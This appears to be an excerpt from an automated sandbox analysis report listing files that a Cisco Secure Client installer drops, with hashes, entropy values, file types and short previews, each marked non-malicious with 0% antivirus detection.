                                                                                                                                      Preview:{.. "component" : [.. {.. "architecture" : "x86_64",.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "platform" : "windows",.. "type" : "component",.. "version" : "5.0.04021".. }.. ]..}..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Install\Dependency\is-VGE7Q.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1375
                                                                                                                                      Entropy (8bit):3.276910195764313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1HTGBAZ6x2XA7h/xmv2uEi+Yx7E36x2XAiB/xmv2uEi+Yx78vUsPRmOV6V:BRAj02uEi+hAO02uEi+zhZmOo
                                                                                                                                      MD5:565E42342B7C2AF14F371A39589C1B67
                                                                                                                                      SHA1:DAB8871D9D3C5E565D40437FF366D944C1E51661
                                                                                                                                      SHA-256:13DDFA583A7C4A29EF617887C77AA4E3DA998F52F76D91E83C57B2D38192F555
                                                                                                                                      SHA-512:8F21388EA0BCD76ECCA88DEA5ED7292E64A0CC7BBA285272B02942D868E92ECB701D9ECBE2C172A87AF06FB16EA5DD2513075792ECB3556DC09C08A8CB4B7FD5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "component" : [.. {.. "dependencies" : [.. {.. "condition" : [.. {.. "architecture" : "x86".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "require" : [.. {.. "version" : "5.0.04021".. }.. ],.. "type" : "component".. },.. {.. "condition" : [.. {.. "architecture" : "x86_64".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "requ

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Install\Dependency\vpn_manifest.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1375
                                                                                                                                      Entropy (8bit):3.276910195764313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1HTGBAZ6x2XA7h/xmv2uEi+Yx7E36x2XAiB/xmv2uEi+Yx78vUsPRmOV6V:BRAj02uEi+hAO02uEi+zhZmOo
                                                                                                                                      MD5:565E42342B7C2AF14F371A39589C1B67
                                                                                                                                      SHA1:DAB8871D9D3C5E565D40437FF366D944C1E51661
                                                                                                                                      SHA-256:13DDFA583A7C4A29EF617887C77AA4E3DA998F52F76D91E83C57B2D38192F555
                                                                                                                                      SHA-512:8F21388EA0BCD76ECCA88DEA5ED7292E64A0CC7BBA285272B02942D868E92ECB701D9ECBE2C172A87AF06FB16EA5DD2513075792ECB3556DC09C08A8CB4B7FD5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "component" : [.. {.. "dependencies" : [.. {.. "condition" : [.. {.. "architecture" : "x86".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "require" : [.. {.. "version" : "5.0.04021".. }.. ],.. "type" : "component".. },.. {.. "condition" : [.. {.. "architecture" : "x86_64".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "requ

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\OpenSource.html (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):556
                                                                                                                                      Entropy (8bit):4.645067217480077
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:VKYMF1IXH5EkqfXMF1ITOLKvXwCPijecTygdLe3f8ytWHtO+PGb:iF1a6AF1owBlPkNtWNa
                                                                                                                                      MD5:A54C8C0CFD88CFE16115DCFF322A637A
                                                                                                                                      SHA1:DFD99A331FE511542CEE60731DE1F603AB11C3AD
                                                                                                                                      SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                      SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3908712
                                                                                                                                      Entropy (8bit):6.887797216959267
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:1R8wYv1zxStjGudpDcpXkuHdMRwou2pMOLmFn+d8tPB19nW/7BioqbCJ6JMfS20A:1R8w66ttdpDcpUs48nOL6+y719nWTT
                                                                                                                                      MD5:2A1D5A1BEB44C39B287BB7B9D34DC94E
                                                                                                                                      SHA1:F6BBD68D77978793BC348E181A1E8D2130C12AD3
                                                                                                                                      SHA-256:586085F4C7928D93E7C941705837506A69302168347136346D6784F78E67BBDD
                                                                                                                                      SHA-512:F05F14327B6C341444463CD774358D241655C06D910BAC2F72F007CD1052CE0832697E4F386C2F0810BE501F1E992B6E390A7484CCCEBFD0BB8522E7930246F3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........H...).X.).X.).X.B.Y.).X.B.Y_).X.F.X.).X.\.Y.).X.\.Y.).X.\.Y.).X6@.Y.).X.).X.).X.\.Y|(.X.B.Y.).X.B.Y.).X.).X.(.XP\.Y.).XP\.Y.).XP\.X.).X.)qX.).XP\.Y.).XRich.).X........................PE..L......d...........!......%.........@'........%...............................;...../.<...@A..........................3......8.......9..............\;.hH....9......v2.T...................@w2.....Xv2.@.............%.\............................text...z.%.......%................. ..`.rdata........%.......%.............@..@.data.........8.......8.............@....rsrc.........9......<9.............@..@.reloc........9......D9.............@..B................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-34UTL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):115
                                                                                                                                      Entropy (8bit):4.299463045055552
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                      MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                      SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                      SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                      SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-96AL6.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3908712
                                                                                                                                      Entropy (8bit):6.887797216959267
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:1R8wYv1zxStjGudpDcpXkuHdMRwou2pMOLmFn+d8tPB19nW/7BioqbCJ6JMfS20A:1R8w66ttdpDcpUs48nOL6+y719nWTT
                                                                                                                                      MD5:2A1D5A1BEB44C39B287BB7B9D34DC94E
                                                                                                                                      SHA1:F6BBD68D77978793BC348E181A1E8D2130C12AD3
                                                                                                                                      SHA-256:586085F4C7928D93E7C941705837506A69302168347136346D6784F78E67BBDD
                                                                                                                                      SHA-512:F05F14327B6C341444463CD774358D241655C06D910BAC2F72F007CD1052CE0832697E4F386C2F0810BE501F1E992B6E390A7484CCCEBFD0BB8522E7930246F3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........H...).X.).X.).X.B.Y.).X.B.Y_).X.F.X.).X.\.Y.).X.\.Y.).X.\.Y.).X6@.Y.).X.).X.).X.\.Y|(.X.B.Y.).X.B.Y.).X.).X.(.XP\.Y.).XP\.Y.).XP\.X.).X.)qX.).XP\.Y.).XRich.).X........................PE..L......d...........!......%.........@'........%...............................;...../.<...@A..........................3......8.......9..............\;.hH....9......v2.T...................@w2.....Xv2.@.............%.\............................text...z.%.......%................. ..`.rdata........%.......%.............@..@.data.........8.......8.............@....rsrc.........9......<9.............@..@.reloc........9......D9.............@..B................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-BFC5E.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):118
                                                                                                                                      Entropy (8bit):4.356540827709149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                      MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                      SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                      SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                      SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-KB5KU.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.383545038270626
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                      MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                      SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                      SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                      SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-UQIPE.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.323029521506045
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                      MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                      SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                      SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                      SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\pluginreg_vpn_api.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.323029521506045
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                      MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                      SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                      SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                      SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\pluginreg_vpn_feedback.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.383545038270626
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                      MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                      SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                      SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                      SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\pluginreg_vpn_ipsec.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):115
                                                                                                                                      Entropy (8bit):4.299463045055552
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                      MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                      SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                      SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                      SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\pluginreg_vpn_webhelper.json (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):118
                                                                                                                                      Entropy (8bit):4.356540827709149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                      MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                      SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                      SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                      SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):42600
                                                                                                                                      Entropy (8bit):6.850341851307747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                      MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                      SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                      SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                      SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.X.^h..^h..^h..&...^h..+l..^h..+k..^h..+m..^h..+i..^h..+i..^h..5i..^h..^i..^h..+a..^h..+...^h..^...^h..+j..^h.Rich.^h.................PE..L...K..d.................4...*......p .......P....@.......................................@.................................8].......................^..hH..........LU..T............................U..@............P..,............................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data...L....p.......P..............@....rsrc................R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5Y..5Y..5Y.6X..5Y.0X..5Y..1X..5Y..6X..5Y.1X..5Y..0X..5Y..0X..5Y.4X..5Y..4Y..5Y..<XZ.5Y...Y..5Y..Y..5Y..7X..5YRich..5Y................PE..L......d.................\...(...............p....@.................................../...@..................................n..h.....#..Y...........b..hH...@,.<d......T...................@.......h...@............p..|............................text....Z.......\.................. ..`.rdata...(...p...*...`..............@..@.data....<..........................@....rsrc....Y....#..Z....#.............@..@.reloc..<d...@,..f....+.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....v...v...v.......v......v......>v.......v.......v.......v.......v....q..v...v..Dv.......v.......v.......v...vu..v.......v..Rich.v..........PE..L......d...........!................PF..............................................q.....@A.........................y..$....z..d.......................hH...........a..T...........................Hb..@...............4............................text............................... ..`.rdata..Pr.......t..................@..@.data................l..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-8OL4N.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5Y..5Y..5Y.6X..5Y.0X..5Y..1X..5Y..6X..5Y.1X..5Y..0X..5Y..0X..5Y.4X..5Y..4Y..5Y..<XZ.5Y...Y..5Y..Y..5Y..7X..5YRich..5Y................PE..L......d.................\...(...............p....@.................................../...@..................................n..h.....#..Y...........b..hH...@,.<d......T...................@.......h...@............p..|............................text....Z.......\.................. ..`.rdata...(...p...*...`..............@..@.data....<..........................@....rsrc....Y....#..Z....#.............@..@.reloc..<d...@,..f....+.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T4BIJ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....v...v...v.......v......v......>v.......v.......v.......v.......v....q..v...v..Dv.......v.......v.......v...vu..v.......v..Rich.v..........PE..L......d...........!................PF..............................................q.....@A.........................y..$....z..d.......................hH...........a..T...........................Hb..@...............4............................text............................... ..`.rdata..Pr.......t..................@..@.data................l..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\cs-cz\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
